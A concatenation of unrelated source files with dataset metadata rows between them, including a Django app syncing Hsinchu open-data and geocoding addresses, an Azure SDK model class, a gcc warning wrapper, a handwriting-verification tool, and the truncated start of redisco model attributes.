success, lat, lng = AddressToLatlng(address)
if success == True:
wgs84locate = latlng(lat, lng)
loc = location(address,wgs84locate)
else:
wgs84locate = latlng(0.0, 0.0)
loc = location(address,wgs84locate)
g = temple(jsonObj[u"寺廟名稱"],jsonObj[u"地區"],jsonObj[u"主祀神像"],jsonObj[u"教別"],jsonObj[u"組織型態"],loc,jsonObj[u"寺廟電話 1"],jsonObj[u"寺廟電話 2"])
templeLst.append(g)
except urllib.error.HTTPError as e:
print(e.code)
print(e.read().decode("utf-8-sig"))
return render(request,
'app/allmygods.html',
context_instance = RequestContext(request,
{
'title':'求人不如求神',
'gods':templeLst,
}))
def address_to_location(request):
assert isinstance(request, HttpRequest)
#address = request.POST['address']
#if address == "":
try:
success, lat, lng = AddressToLatlng(address)
if success == True:
return HttpResponse(json.dumps({"status": "OK", "lat": lat, "lng": lng}),
content_type="application/json")
else:
return HttpResponse(json.dumps({"status": "Fail", "lat": lat, "lng": lng}),
content_type="application/json")
except urllib.error.HTTPError as e:
print(e.code)
print(e.read().decode("utf-8-sig"))
return HttpResponse(json.dumps({"status": "Fail", "lat": lat, "lng": lng}),
content_type="application/json")
def AddressToLatlng(address):
encodeAddress = urllib.parse.urlencode({'address': address})
url = "https://maps.googleapis.com/maps/api/geocode/json?%s" % encodeAddress
req = Request(url)
response = urllib.request.urlopen(req).readall().decode('utf-8')
jsongeocode = json.loads(response)
longitude = 0.0
latitude = 0.0
success = False
if jsongeocode['status'] == "OK":
success = True
latitude = jsongeocode['results'][0]['geometry']['location']['lat']
longitude = jsongeocode['results'][0]['geometry']['location']['lng']
return success, latitude, longitude
@csrf_protect
def syncTempleInfo(request):
assert isinstance(request, HttpRequest)
req = Request("http://opendata.hccg.gov.tw/dataset/480911dd-6eea-4f97-a7e8-334b32cc8f6b/resource/ee12c072-e8aa-4be1-8179-f1c9606198f3/download/20150304091340575.json")
templeLst = []
success = False
try:
response = urllib.request.urlopen(req)
ur = response.readall().decode('utf-8-sig')
j_obj = json.loads(ur)
for jsonObj in j_obj:
address = jsonObj[u"寺廟所在地"]
success, lat, lng = AddressToLatlng(address)
if success == True:
wgs84locate = latlng(lat, lng)
loc = location(address,wgs84locate)
else:
wgs84locate = latlng(0.0, 0.0)
loc = location(address,wgs84locate)
g = temple(jsonObj[u"寺廟名稱"],jsonObj[u"地區"],jsonObj[u"主祀神像"],jsonObj[u"教別"],jsonObj[u"組織型態"],loc,jsonObj[u"寺廟電話 1"],jsonObj[u"寺廟電話 2"])
templeLst.append(g)
except urllib.error.HTTPError as e:
print(e.code)
print(e.read().decode("utf-8-sig"))
if len(templeLst) > 0:
# sync templeInfo to database
for item in templeLst:
filterResult = TempleInfo.objects.filter_temple(name = item.name, locateRegion = item.locateRegion, masterGod = item.mastergod)
if len(filterResult) == 0:
templeItem = TempleInfo.objects.create_temple(name=item.name, locateRegion=item.locateRegion, religiousBelief=item.religiousBelief,
masterGod=item.mastergod, address=item.location.address, latitude=item.location.latlng.lat,
longitude=item.location.latlng.lng, phone1=item.phone1, phone2=item.phone2)
elif len(filterResult) == 1 and filterResult[0].latitude == 0 and filterResult[0].longitude == 0 :
latitude = item.location.latlng.lat
longitude = item.location.latlng.lng
if latitude != 0 and longitude != 0:
filterResult[0].latitude = latitude
filterResult[0].longitude = longitude
filterResult[0].save()
return HttpResponse(json.dumps({"status": "Success"}),
content_type="application/json")
else:
return HttpResponse(json.dumps({"status": "Fail"}),
content_type = "application/json")
@csrf_protect
def syncCultureInfo(request):
assert isinstance(request, HttpRequest)
req = Request("http://opendata.hccg.gov.tw/dataset/28f1cd76-59b9-4877-b350-b064db635eb8/resource/82c2be17-0593-429b-842b-409735a9860f/download/20151119195903997.json")
activityLst = []
success = False
try:
response = urllib.request.urlopen(req)
ur = response.readall().decode('utf-8-sig')
j_obj = json.loads(ur)
for jsonObj in j_obj:
address = jsonObj[u"地點地址"]
success, lat, lng = AddressToLatlng(address)
if success == True:
wgs84locate = latlng(lat, lng)
loc = location(address,wgs84locate)
else:
wgs84locate = latlng(0.0, 0.0)
loc = location(address,wgs84locate)
activity = cultureActiviy(jsonObj[u"活動主題"],jsonObj[u"起始日"],jsonObj[u"截止日"],jsonObj[u"時間"],jsonObj[u"活動名稱"],jsonObj[u"地點"],loc)
activityLst.append(activity)
except urllib.error.HTTPError as e:
print(e.code)
print(e.read().decode("utf-8-sig"))
if len(activityLst) > 0:
# sync CultureActiviyInfo to database
for item in activityLst:
filterResult = CultureActiviyInfo.objects.filter_activity(name = item.name,activityTheme = item.activityTheme, locationName = item.locationName,
address = item.location.address, startDate = item.startDate, endDate = item.endDate)
if len(filterResult) == 0:
templeItem = CultureActiviyInfo.objects.create_activity(name=item.name, activityTheme=item.activityTheme,locationName= item.locationName,
address=item.location.address, latitude=item.location.latlng.lat, longitude=item.location.latlng.lng,
startDate = item.startDate, endDate = item.endDate, activityTime = item.time)
elif len(filterResult) == 1 and filterResult[0].latitude == 0 and filterResult[0].longitude == 0 :
latitude = item.location.latlng.lat
longitude = item.location.latlng.lng
if latitude != 0 and longitude != 0:
filterResult[0].latitude = latitude
filterResult[0].longitude = longitude
filterResult[0].save()
return HttpResponse(json.dumps({"status": "Success"}),
content_type="application/json")
else:
return HttpResponse(json.dumps({"status": "Fail"}),
content_type = "application/json")
@csrf_protect
def syncReputationOfAnimalHospital(request):
assert isinstance(request, HttpRequest)
req = Request("http://opendata.hccg.gov.tw/dataset/9055d606-9231-4e67-a8bf-2500d736962d/resource/cbefd6b2-8e1b-4348-8136-085241266c92/download/20150306111824929.json")
response = urllib.request.urlopen(req)
ur = response.readall().decode('utf-8-sig')
ahr = ReputationService(ur)
hos = ahr.get_animal_hospitals() # (success, address, latitude, longitude)
links = ahr.get_hospital_links(hos.keys())
data = ahr.blog_crawler(links)
rep = ahr.get_reputation(hos, data) # name: ((success, address, latitude, longitude), {'positive':score,'negative':score})
jsformat = json.dumps(rep)
repLst = []
for k, v in rep.items():
wgs84locate = latlng(v[0][2], v[0][3])
locateLatlng = location(v[0][1],wgs84locate)
repItem = hospitalReputation(k,locateLatlng,v[1]['positive'],v[1]['negative'])
repLst.append(repItem)
if len(repLst) > 0:
# sync CultureActiviyInfo to database
for item in repLst:
filterResult = AnamialHospitalReputation.objects.filter_reputation(name=item.name,address=item.location.address)
today = date.today()
if len(filterResult) == 0:
templeItem = AnamialHospitalReputation.objects.create_reputation(name=item.name,address=item.location.address,
latitude=item.location.latlng.lat,longitude=item.location.latlng.lng,
postiveScore=item.positiveReputation,negativeScore=item.negativeReputation,
dataDT=today)
elif len(filterResult) == 1:
if item.location.latlng.lat == 0 or item.location.latlng.lng == 0 :
filterResult[0].latitude = item.location.latlng.lat
filterResult[0].longitude = item.location.latlng.lng
filterResult[0].postiveScore = item.positiveReputation
filterResult[0].negativeScore = item.negativeReputation
filterResult[0].dataDT = today
filterResult[0].save()
return HttpResponse(json.dumps({"status": "Success"}),
content_type="application/json")
@csrf_protect
def syncCityNews(request):
assert isinstance(request, HttpRequest)
req = Request("http://opendata.hccg.gov.tw/dataset/e9443b8a-da93-46a9-b794-49aabbb815fd/resource/0f3f2cb2-2552-44bf-ba08-54dfaafda034/download/20151127133908155.json")
newsLst = []
success = False
try:
response = urllib.request.urlopen(req)
ur = response.readall().decode('utf-8-sig')
j_obj = json.loads(ur)
for jsonObj in j_obj:
start = TaiwanDateToStdDate(jsonObj[u"發布起始日期"])
end = TaiwanDateToStdDate(jsonObj[u"發布截止日期"])
news = cityNewes(jsonObj[u"標題"],start,end,jsonObj[u"類別"],jsonObj[u"內容"],jsonObj[u"圖片路徑(1)"])
newsLst.append(news)
except urllib.error.HTTPError as e:
print(e.code)
print(e.read().decode("utf-8-sig"))
if len(newsLst) > 0:
# sync CityNewsItem to database
for item in newsLst:
filterResult = CityNewsItem.objects.filter_news(title = item.title, type = item.type, publishDate = item.publishDate, endDate = item.endDate)
if len(filterResult) == 0:
templeItem = CityNewsItem.objects.create_news(title = item.title, type = item.type,content = item.content, publishDate = item.publishDate,
endDate = item.endDate, picturePath = item.picturePath)
elif len(filterResult) == 1 :
filterResult[0].content = item.content
filterResult[0].picturePath = item.picturePath
filterResult[0].save()
return HttpResponse(json.dumps({"status": "Success"}),
content_type="application/json")
else:
return HttpResponse(json.dumps({"status": "Fail"}),
content_type = "application/json")
def cultureActivities(request):
"""Renders the about page."""
assert isinstance(request, HttpRequest)
return render(request,
'app/cultureActivities.html',
context_instance = RequestContext(request,
{
'title':'當月藝文活動',
'year':datetime.now().year,
}))
def cityNews(request):
"""Renders the about page."""
assert isinstance(request, HttpRequest)
return render(request,
'app/cityNews.html',
context_instance = RequestContext(request,
{
'title':'市府新聞',
'year':datetime.now().year,
}))
def TaiwanDateToStdDate(dateStr):
return datetime.strptime(dateStr, "%Y%m%d")
@csrf_protect
def filterCultureActivities(request):
assert isinstance(request, HttpRequest)
keyword = request.POST['keyword']
filterActivities = CultureActiviyInfo.objects.filterByKeyword(keyword)
data = serializers.serialize("json", filterActivities, fields=('name','activityTheme',
'address','latitude','longitude',
'locationName','startDate','endDate','activityTime'))
decoded = json.loads(data)
return HttpResponse(json.dumps({"status": "Success", "activityInfo": decoded}),
content_type="application/json")
@csrf_protect
def getTop10News(request):
assert isinstance(request, HttpRequest)
topNews = CityNewsItem.objects.TopNews()
data = serializers.serialize("json", topNews, fields=('title','type','content',
'publishDate','picturePath'))
decoded = json.loads(data)
return HttpResponse(json.dumps({"status": "Success", "news": decoded}),
content_type="application/json")
@csrf_protect
def searchAnimalHospitalByName(request):
assert isinstance(request, HttpRequest)
name = request.POST['name']
topRputations = AnamialHospitalReputation.objects.filterByName(name)
data = serializers.serialize("json", topRputations, fields=('name','address','latitude','longitude',
'postiveScore','negativeScore','dataDT'))
decoded = json.loads(data)
return HttpResponse(json.dumps({"status": "Success", "reputation": decoded}),
content_type="application/json")
@csrf_protect
def getTop10AnimalHospital(request):
assert isinstance(request, HttpRequest)
topRputations = AnamialHospitalReputation.objects.Top10Hospital()
data = serializers.serialize("json", topRputations, fields=('name','address','latitude','longitude',
'postiveScore','negativeScore','dataDT'))
decoded = json.loads(data)
return HttpResponse(json.dumps({"status": "Success", "reputation": decoded}),
content_type="application/json")
@csrf_protect
def getReputationOfAnimalHospital(request):
assert isinstance(request, HttpRequest)
allRputations = AnamialHospitalReputation.objects.getAll()
data = serializers.serialize("json", allRputations, fields=('name','address','latitude','longitude',
'postiveScore','negativeScore','dataDT'))
decoded = json.loads(data)
return HttpResponse(json.dumps({"status": "Success", "reputation": decoded}),
content_type="application/json")
def animalHospitalReputation(request):
assert isinstance(request, HttpRequest)
return render(request,
'app/animalHospitalReputation.html',
context_instance = RequestContext(request,
{
'title':'動物醫院評比',
'year':datetime.now().year,
}))
def memberPerformance(request):
"""Renders the about page."""
assert isinstance(request, HttpRequest)
return render(request,
'app/memberPerformance.html',
context_instance = RequestContext(request,
{
'title':'議員所提地方建設建議事項',
'year':datetime.now().year,
}))
|
mit
| 9,109,989,609,018,349,000
| 41.778022
| 173
| 0.602631
| false
| 3.752989
| false
| false
| false
|
Azure/azure-sdk-for-python
|
sdk/cognitiveservices/azure-cognitiveservices-language-textanalytics/azure/cognitiveservices/language/textanalytics/models/entity_record.py
|
1
|
2689
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class EntityRecord(Model):
"""EntityRecord.
Variables are only populated by the server, and will be ignored when
sending a request.
:param name: Entity formal name.
:type name: str
:param matches: List of instances this entity appears in the text.
:type matches:
list[~azure.cognitiveservices.language.textanalytics.models.MatchRecord]
:param wikipedia_language: Wikipedia language for which the WikipediaId
and WikipediaUrl refers to.
:type wikipedia_language: str
:param wikipedia_id: Wikipedia unique identifier of the recognized entity.
:type wikipedia_id: str
:ivar wikipedia_url: URL for the entity's Wikipedia page.
:vartype wikipedia_url: str
:param bing_id: Bing unique identifier of the recognized entity. Use in
conjunction with the Bing Entity Search API to fetch additional relevant
information.
:type bing_id: str
:param type: Entity type from Named Entity Recognition model
:type type: str
:param sub_type: Entity sub type from Named Entity Recognition model
:type sub_type: str
"""
_validation = {
'wikipedia_url': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'matches': {'key': 'matches', 'type': '[MatchRecord]'},
'wikipedia_language': {'key': 'wikipediaLanguage', 'type': 'str'},
'wikipedia_id': {'key': 'wikipediaId', 'type': 'str'},
'wikipedia_url': {'key': 'wikipediaUrl', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'sub_type': {'key': 'subType', 'type': 'str'},
}
def __init__(self, **kwargs):
super(EntityRecord, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.matches = kwargs.get('matches', None)
self.wikipedia_language = kwargs.get('wikipedia_language', None)
self.wikipedia_id = kwargs.get('wikipedia_id', None)
self.wikipedia_url = None
self.bing_id = kwargs.get('bing_id', None)
self.type = kwargs.get('type', None)
self.sub_type = kwargs.get('sub_type', None)
|
mit
| 6,033,418,252,891,552,000
| 39.134328
| 78
| 0.612495
| false
| 4.043609
| false
| false
| false
|
poondog/kangaroo-m7-mkv
|
scripts/gcc-wrapper.py
|
1
|
3884
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2011-2012, Code Aurora Forum. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Code Aurora nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NON-INFRINGEMENT ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Invoke gcc, looking for warnings, and causing a failure if there are
# non-whitelisted warnings.
import errno
import re
import os
import sys
import subprocess
# Note that gcc uses unicode, which may depend on the locale. TODO:
# force LANG to be set to en_US.UTF-8 to get consistent warnings.
allowed_warnings = set([
"return_address.c:62",
"swab.h:49",
"SemaLambda.cpp:946",
"CGObjCGNU.cpp:1414",
"BugReporter.h:146",
"RegionStore.cpp:1904",
"SymbolManager.cpp:484",
"RewriteObjCFoundationAPI.cpp:737",
"RewriteObjCFoundationAPI.cpp:696",
"CommentParser.cpp:394",
"CommentParser.cpp:391",
"CommentParser.cpp:356",
"LegalizeDAG.cpp:3646",
"IRBuilder.h:844",
"DataLayout.cpp:193",
"transport.c:653",
"xt_socket.c:307",
"xt_socket.c:161",
"inet_hashtables.h:356",
"xc4000.c:1049",
"xc4000.c:1063",
])
# Capture the name of the object file, can find it.
ofile = None
warning_re = re.compile(r'''(.*/|)([^/]+\.[a-z]+:\d+):(\d+:)? warning:''')
def interpret_warning(line):
"""Decode the message from gcc. The messages we care about have a filename, and a warning"""
line = line.rstrip('\n')
m = warning_re.match(line)
if m and m.group(2) not in allowed_warnings:
print "error, forbidden warning:", m.group(2)
# If there is a warning, remove any object if it exists.
if ofile:
try:
os.remove(ofile)
except OSError:
pass
sys.exit(1)
def run_gcc():
args = sys.argv[1:]
# Look for -o
try:
i = args.index('-o')
global ofile
ofile = args[i+1]
except (ValueError, IndexError):
pass
compiler = sys.argv[0]
try:
proc = subprocess.Popen(args, stderr=subprocess.PIPE)
for line in proc.stderr:
print line,
interpret_warning(line)
result = proc.wait()
except OSError as e:
result = e.errno
if result == errno.ENOENT:
print args[0] + ':',e.strerror
print 'Is your PATH set correctly?'
else:
print ' '.join(args), str(e)
return result
if __name__ == '__main__':
status = run_gcc()
sys.exit(status)
|
gpl-2.0
| 3,073,904,154,896,566,300
| 32.482759
| 97
| 0.664779
| false
| 3.770874
| false
| false
| false
|
cemagg/sucem-fem
|
sandbox/flux_calc/plotty.py
|
1
|
1219
|
from __future__ import division
import pylab
import numpy as np
import run_data
reload(run_data)
def get_unit_gradients(resdict, ind=0, op=lambda x: x):
return dict((k, np.gradient(op(v[ind])))
for k,v in resdict.iteritems())
def get_gradients(resdict, op1=lambda x: x, op2=lambda x: x):
return dict((k, np.gradient(op1(v[1])) / np.gradient(op2(v[0])))
for k,v in resdict.iteritems())
def logify(resdict, op=lambda x: x):
return dict((k, np.log(op(v))) for k,v in resdict.iteritems())
vflux_gradients_unity = get_unit_gradients(run_data.vflux, ind=1,
op=lambda x: np.real(x))
vflux_gradients = get_gradients(run_data.vflux, op1=np.real)
vflux_log = logify(vflux_gradients, op=np.abs)
vflux_log_h = logify(run_data.vflux, op=lambda x: x[0])
pylab.figure(1)
pylab.hold(0)
pylab.plot(-vflux_log_h['1r'], vflux_log['1r'], label='reversed')
pylab.hold(1)
pylab.plot(-vflux_log_h['1'], vflux_log['1'], label='forward')
pylab.legend(loc=0)
pylab.figure(2)
pylab.hold(0)
pylab.plot(-vflux_log_h['2r'], vflux_log['2r'], label='reversed')
pylab.hold(1)
pylab.plot(-vflux_log_h['2'], vflux_log['2'], label='forward')
pylab.legend(loc=0)
|
gpl-3.0
| 247,746,161,481,558,900
| 32.861111
| 68
| 0.647252
| false
| 2.661572
| false
| false
| false
|
astrilchuk/sd2xmltv
|
libschedulesdirect/common/servicecountry.py
|
1
|
1174
|
import logging
class ServiceCountry(object):
def __init__(self):
self.full_name = None # type: unicode
self.short_name = None # type: unicode
self.postal_code_example = None # type: unicode
self.postal_code_regex = None # type: unicode
self.one_postal_code = False # type: bool
@classmethod
def from_dict(cls, dct): # type: (dict) -> ServiceCountry
"""
:param dct:
:return:
"""
service_country = cls()
if "fullName" in dct:
service_country.full_name = dct.pop("fullName")
if "shortName" in dct:
service_country.short_name = dct.pop("shortName")
if "postalCodeExample" in dct:
service_country.postal_code_example = dct.pop("postalCodeExample")
if "postalCode" in dct:
service_country.postal_code_regex = dct.pop("postalCode")
if "onePostalCode" in dct:
service_country.onePostalCode = dct.pop("onePostalCode")
if len(dct) != 0:
logging.warn("Key(s) not processed for ServiceCountry: %s", ", ".join(dct.keys()))
return service_country
|
mit
| 825,535,162,735,604,700
| 26.302326
| 94
| 0.580068
| false
| 3.811688
| false
| false
| false
|
glomex/gcdt-lookups
|
setup.py
|
1
|
1606
|
from setuptools import setup, find_packages
from codecs import open
import os
here = os.path.abspath(os.path.dirname(__file__))
# Get the long description from the README file
try:
import pypandoc
long_description = pypandoc.convert('README.md', format='md', to='rst')
except(IOError, ImportError):
with open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
# get the dependencies and installs
with open(os.path.join(here, 'requirements.txt'), encoding='utf-8') as f:
all_reqs = f.read().split('\n')
install_requires = [x.strip() for x in all_reqs if ('git+' not in x) and
(not x.startswith('#')) and (not x.startswith('-'))]
dependency_links = [x.strip().replace('git+', '') for x in all_reqs if 'git+' not in x]
setup(
name='gcdt-lookups',
version='0.0.26',
description='Plugin (gcdt-lookups) for gcdt',
long_description=long_description,
license='MIT',
classifiers=[
'Natural Language :: English',
'Intended Audience :: Developers',
'Environment :: Console',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.6',
],
keywords='',
packages=find_packages(exclude=['docs', 'tests*']),
include_package_data=True,
author='glomex SRE Team',
install_requires=install_requires,
dependency_links=dependency_links,
author_email='mark.fink@glomex.com',
entry_points={
'gcdt10': [
'lookups=gcdt_lookups.lookups',
],
}
)
|
mit
| -4,124,764,179,536,673,000
| 31.12
| 87
| 0.627024
| false
| 3.600897
| false
| false
| false
|
bdzimmer/handwriting
|
handwriting/verify.py
|
1
|
13242
|
# -*- coding: utf-8 -*-
"""
Interactively verify predictions from algorithms so they can be used as ground
truth for evaluation or training.
"""
# Copyright (c) 2017 Ben Zimmer. All rights reserved.
# New process that uses mutable tree of Samples.
import os
import sys
import cv2
import numpy as np
from handwriting import analysisimage, annotate, driver
from handwriting import findletters, charclass, improc, util
from handwriting.prediction import Sample
def int_safe(obj, default=0):
"""safely convert something to an integer"""
try:
obj_int = int(obj)
except ValueError:
obj_int = default
return obj_int
def _image_idx(x_val, widths, hgap):
"""find the index of an image given a position, image widths, and a
horizontal gap size"""
widths = [x + hgap for x in widths]
widths_cumsum = np.cumsum([0] + widths)
return np.where(x_val >= widths_cumsum)[0][-1]
def _mutate_set_verify_recursive(sample, verified):
"""recursively set a hierarchy of samples as verified or unverified"""
sample.verified = verified
if isinstance(sample.result, Sample):
_mutate_set_verify_recursive(sample.result, verified)
elif isinstance(sample.result, list):
for samp in sample.result:
_mutate_set_verify_recursive(samp, verified)
def _verification_status_recursive(sample, verified=0, total=0):
"""recursively determine how much of the sample has been verified"""
total = total + 1
if sample.verified:
verified = verified + 1
if isinstance(sample.result, Sample):
verified, total = _verification_status_recursive(
sample.result, verified, total)
elif isinstance(sample.result, list):
for samp in sample.result:
verified, total = _verification_status_recursive(
samp, verified, total)
return verified, total
def _mutate_recalculate_list(
list_update, new_items, compare_func, calc_func):
"""update samples in a list, recalculating items that have changed"""
# list_update is a list of Samples
# new_items are not samples; calc_func will take one of these and return
# a Sample
res = []
for item in new_items:
found = False
for old_item in list_update:
if compare_func(item, old_item.data):
print(old_item.data)
# y.verified = True
res.append(old_item)
found = True
break
if not found:
print("recalculating", item)
sample = calc_func(item)
# sample.verified = True
res.append(sample)
print("done updating list")
list_update[:] = res
def _mutate_verify_line_poss(image_sample, process_line_position):
"""verify positions of lines"""
print("Verify the positions of the lines.")
print("left mouse button: create a new line with two clicks")
print("right mouse button: delete the nearest line")
print("escape: done")
print()
lines = [x.data for x in image_sample.result]
lines_verified = annotate.annotate_lines(image_sample.data, lines)
# update what's been modified in the hierarchy
calc_func = lambda x: process_line_position(x, image_sample.data)
_mutate_recalculate_list(
image_sample.result, lines_verified, np.allclose, calc_func)
image_sample.verified = True
for samp in image_sample.result: # verify line position samples
samp.verified = True
def _mutate_verify_multi(
line_image_sample,
process_word_position,
process_char_position,
new_char_annotation_mode):
"""open different annotation options depending on click location
in line analysis image"""
window_title = "line analysis"
def draw():
"""refresh the view"""
lai = analysisimage.LineAnalysisImage(line_image_sample)
cv2.imshow(window_title, lai.image)
def on_mouse(event, mouse_x, mouse_y, flags, params):
"""helper"""
if event == cv2.EVENT_LBUTTONDOWN:
print(mouse_x, mouse_y, "left")
lai = analysisimage.LineAnalysisImage(line_image_sample)
if mouse_y >= lai.line_y_start and mouse_y < lai.line_y_end:
print("line")
print("Verify the positions of the words.")
print("left mouse button: create a new word with two clicks")
print("right mouse button: delete the nearest word")
print("escape: done")
print()
word_positions = [x.data for x in line_image_sample.result]
words_verified = annotate.annotate_word_positions(
line_image_sample.data, word_positions)
calc_func = lambda x: process_word_position(x, line_image_sample.data)
_mutate_recalculate_list(
line_image_sample.result, words_verified, np.allclose, calc_func)
line_image_sample.verified = True
for samp in line_image_sample.result: # verify word position samples
samp.verified = True
draw()
elif mouse_y >= lai.words_y_start and mouse_y < lai.words_y_end:
print("words")
# which word are we modifying?
word_positions = line_image_sample.result
idx = _image_idx(
mouse_x - lai.all_words_im_x,
[word_pos.data[1] - word_pos.data[0] for word_pos in word_positions],
analysisimage.HGAP_LARGE)
# TODO: work with word image sample instead
word_position_sample = word_positions[idx]
char_positions = [x.data for x in word_position_sample.result.result]
print("char positions:", char_positions)
if new_char_annotation_mode:
print("Verify the positions of the characters.")
print("left mouse button: create a new character with two clicks")
print("right mouse button: delete the nearest word")
print("escape: done")
print()
char_positions_verified = annotate.annotate_word_positions(
word_position_sample.result.data,
char_positions)
else:
print("Verify the positions of gaps between letters.")
print("left mouse button: create a new gap")
print("right mouse button: delete the nearest gap")
print("escape: done")
print()
char_gaps = findletters.positions_to_gaps(char_positions)
char_gaps_verified = annotate.annotate_letter_gaps(
word_position_sample.result.data,
char_gaps)
char_positions_verified = findletters.gaps_to_positions(char_gaps_verified)
print("char positions verified:", char_positions_verified)
calc_func = lambda x: process_char_position(x, word_position_sample.result.data)
_mutate_recalculate_list(
word_position_sample.result.result, char_positions_verified,
np.allclose, calc_func)
word_position_sample.result.verified = True # verify word image sample
for samp in word_position_sample.result.result: # verify char position samples
samp.verified = True
draw()
elif mouse_y >= lai.char_ims_y_start and mouse_y < lai.char_ims_y_end:
# verify character labels by word
print("char ims")
# which word are we modifying?
word_positions = line_image_sample.result
idx = _image_idx(
mouse_x - lai.all_char_ims_im_x,
[np.sum([char_pos.data[1] - char_pos.data[0] + analysisimage.HGAP_SMALL
for char_pos in word_pos.result.result]) - analysisimage.HGAP_SMALL
for word_pos in word_positions],
analysisimage.HGAP_LARGE)
patch_width = 96
patch_height = 96
pad = lambda x: improc.pad_image(x, patch_width, patch_height)
# TODO: most of this logic is to deal with the charclass interface
def pad_preds(preds):
"""helper"""
return [p.copy(data=(pad(p.data), None, p.data)) for p in preds]
def unpad_preds(preds):
"""helper"""
return [p.copy(data=(p.data[2], p.data[1])) for p in preds]
while idx < len(word_positions):
char_img_samples = [char_pos.result
for char_pos in word_positions[idx].result.result]
chars_working, chars_done = charclass.label_chars(pad_preds(char_img_samples))
# this is a bit of a hack, but it works well for now.
print(len(chars_working), len(chars_done))
if len(chars_done) == 0:
break
char_img_samples_verified = unpad_preds(chars_working) + unpad_preds(chars_done)
for org_sample, new_sample in zip(char_img_samples, char_img_samples_verified):
org_sample.result = new_sample.result
org_sample.verified = new_sample.verified
draw()
idx = idx + 1
elif mouse_y >= lai.chars_y_start and mouse_y < lai.chars_y_end:
print("chars")
cv2.waitKey(1)
if event == cv2.EVENT_RBUTTONDOWN:
print(mouse_x, mouse_y, "right")
cv2.waitKey(1)
cv2.namedWindow(window_title, cv2.WINDOW_NORMAL)
cv2.setMouseCallback(window_title, on_mouse, 0)
draw()
while True:
key = cv2.waitKey(0)
if key == 27:
break
if key == 13:
_mutate_set_verify_recursive(line_image_sample, True)
if key == 8:
_mutate_set_verify_recursive(line_image_sample, False)
draw()
cv2.destroyWindow(window_title)
def main(argv):
"""main program"""
if len(argv) < 3:
print("Usage: verify input_file <line | multi | view>")
sys.exit()
input_filename = argv[1]
verify_type = argv[2]
new_char_annotation_mode = False
# filename has a number version suffix
sample_filename = input_filename + ".sample.pkl"
sample_dirname, sample_basename = os.path.split(sample_filename)
possible_files = [x for x in os.listdir(sample_dirname)
if x.startswith(sample_basename)]
versions = [int_safe(x.split(".")[-1]) for x in possible_files]
latest_idx = np.argmax(versions)
latest_version = versions[latest_idx]
latest_filename = possible_files[latest_idx]
sample_filename_full = os.path.join(sample_dirname, latest_filename)
print("loading sample file:", sample_filename_full)
image_sample = util.load(sample_filename_full)
# with open(sample_filename_full, "rb") as sample_file:
# image_sample = pickle.load(sample_file)
status = _verification_status_recursive(image_sample)
print(
status[0], "/", status[1], "samples verified", "-",
np.round(status[0] / status[1] * 100, 2), "%")
(process_image,
process_line_position,
process_word_position,
process_char_position) = driver.current_best_process()
if verify_type == "line":
_mutate_verify_line_poss(image_sample, process_line_position)
elif verify_type == "view":
for line_pos in image_sample.result:
img = analysisimage.LineAnalysisImage(line_pos.result).image
cv2.namedWindow("line analysis", cv2.WINDOW_NORMAL)
cv2.imshow("line analysis", img)
cv2.waitKey()
else:
if len(argv) > 3:
start_idx = int(argv[3]) - 1
else:
start_idx = 0
for idx in range(start_idx, len(image_sample.result)):
line_pos = image_sample.result[idx]
print("editing line " + str(idx + 1) + " / " + str(len(image_sample.result)))
_mutate_verify_multi(
line_pos.result,
process_word_position, process_char_position,
new_char_annotation_mode)
if verify_type != "view":
status = _verification_status_recursive(image_sample)
print(
status[0], "/", status[1], "samples verified", "-",
np.round(status[0] / status[1] * 100, 2), "%")
sample_filename_full = sample_filename + "." + str(latest_version + 1)
print("writing sample file:", sample_filename_full)
util.save(image_sample, sample_filename_full)
# with open(sample_filename_full, "wb") as sample_file:
# pickle.dump(image_sample, sample_file)
if __name__ == "__main__":
main(sys.argv)
|
bsd-3-clause
| 6,504,261,244,183,423,000
| 37.606414
| 100
| 0.576801
| false
| 4.040891
| true
| false
| false
|
heckj/redisco
|
redisco/models/attributes.py
|
1
|
15052
|
# -*- coding: utf-8 -*-
"""
Defines the fields that can be added to redisco models.
"""
import sys
from datetime import datetime, date
from dateutil.tz import tzutc, tzlocal
from calendar import timegm
from redisco.containers import List
from exceptions import FieldValidationError, MissingID
__all__ = ['Attribute', 'CharField', 'ListField', 'DateTimeField',
'DateField', 'ReferenceField', 'Collection', 'IntegerField',
'FloatField', 'BooleanField', 'Counter']
class Attribute(object):
"""Defines an attribute of the model.
